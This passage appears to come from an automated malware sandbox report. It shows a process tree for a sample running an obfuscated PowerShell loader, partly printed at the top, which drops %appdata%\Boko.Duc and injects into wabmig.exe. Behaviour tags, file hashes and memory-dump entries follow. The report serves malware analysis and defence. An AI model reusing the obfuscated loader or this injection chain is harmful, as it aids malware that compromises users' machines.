ure.Damps ph u nkebTohasAfspt ClarPalmiSignn K,tg S i(Visi$FamiMbyriaHackaReklnB dseTilkf Talo .ntrSkelmSitir iktkUdraeUnsilNed.sFliceIns rErgunPeyoeVa i,Phyl$A atF Th,lAmm uStamgLyketSandsOgdokUndayDis dVelsnLan.i ,genOverg sube.rrenLslas Fr ) cab ');firsaariges $Undervgtets;"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1960
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Boko.Duc && echo t"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:5020
            • C:\Program Files (x86)\windows mail\wabmig.exe
              "C:\Program Files (x86)\windows mail\wabmig.exe"
              5⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:3516

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qnxgjukq.cso.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Boko.Duc
      Filesize

      438KB

      MD5

      4ddea591d053049d64dfdd120458d2f7

      SHA1

      4e54f1b883e3f950b18fc74a86d64e37321b9f05

      SHA256

      e72b6eea450681f6c3bdcfdf39a76f6f3df333097b6f5c5674f47624698c8e1f

      SHA512

      734a40355738241be01b4ee84928eb9918826bad8ba0aaac52d2fc489a053eaefe54794561e372c98880f93b24e93ca80256d922d0a3ee244704c39895a391e2

      Download Submit

    • memory/404-21-0x00007FFE85060000-0x00007FFE85B21000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/404-47-0x00007FFE85060000-0x00007FFE85B21000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/404-64-0x00007FFE85060000-0x00007FFE85B21000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/404-18-0x00007FFE85063000-0x00007FFE85065000-memory.dmp

      Filesize

      8KB

      Download

    • memory/404-15-0x00007FFE85060000-0x00007FFE85B21000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/404-4-0x00007FFE85063000-0x00007FFE85065000-memory.dmp

      Filesize

      8KB

      Download

    • memory/404-6-0x000001F5735B0000-0x000001F5735D2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/404-19-0x00007FFE85060000-0x00007FFE85B21000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/404-16-0x00007FFE85060000-0x00007FFE85B21000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1960-37-0x0000000006070000-0x000000000608E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/1960-40-0x0000000006640000-0x000000000665A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/1960-45-0x0000000008AA0000-0x0000000009DEE000-memory.dmp

      Filesize

      19.3MB

      Download

    • memory/1960-22-0x0000000002770000-0x00000000027A6000-memory.dmp

      Filesize

      216KB

      Download

    • memory/1960-38-0x00000000060B0000-0x00000000060FC000-memory.dmp

      Filesize

      304KB

      Download

    • memory/1960-24-0x00000000051B0000-0x00000000051D2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1960-23-0x0000000005250000-0x0000000005878000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/1960-25-0x0000000005880000-0x00000000058E6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/1960-41-0x0000000007300000-0x0000000007396000-memory.dmp

      Filesize

      600KB

      Download

    • memory/1960-26-0x0000000005960000-0x00000000059C6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/1960-36-0x0000000005A90000-0x0000000005DE4000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/1960-42-0x00000000072B0000-0x00000000072D2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1960-39-0x00000000078C0000-0x0000000007F3A000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/1960-43-0x00000000084F0000-0x0000000008A94000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/3516-61-0x0000000000650000-0x0000000000690000-memory.dmp

      Filesize

      256KB

      Download

    • memory/3516-60-0x0000000000650000-0x00000000018A4000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/3516-46-0x00000000018B0000-0x0000000002BFE000-memory.dmp

      Filesize

      19.3MB

      Download

    • memory/3516-65-0x00000000210D0000-0x0000000021120000-memory.dmp

      Filesize

      320KB

      Download

    • memory/3516-66-0x00000000211C0000-0x0000000021252000-memory.dmp

      Filesize

      584KB

      Download

    • memory/3516-67-0x00000000211A0000-0x00000000211AA000-memory.dmp

      Filesize

      40KB

      Download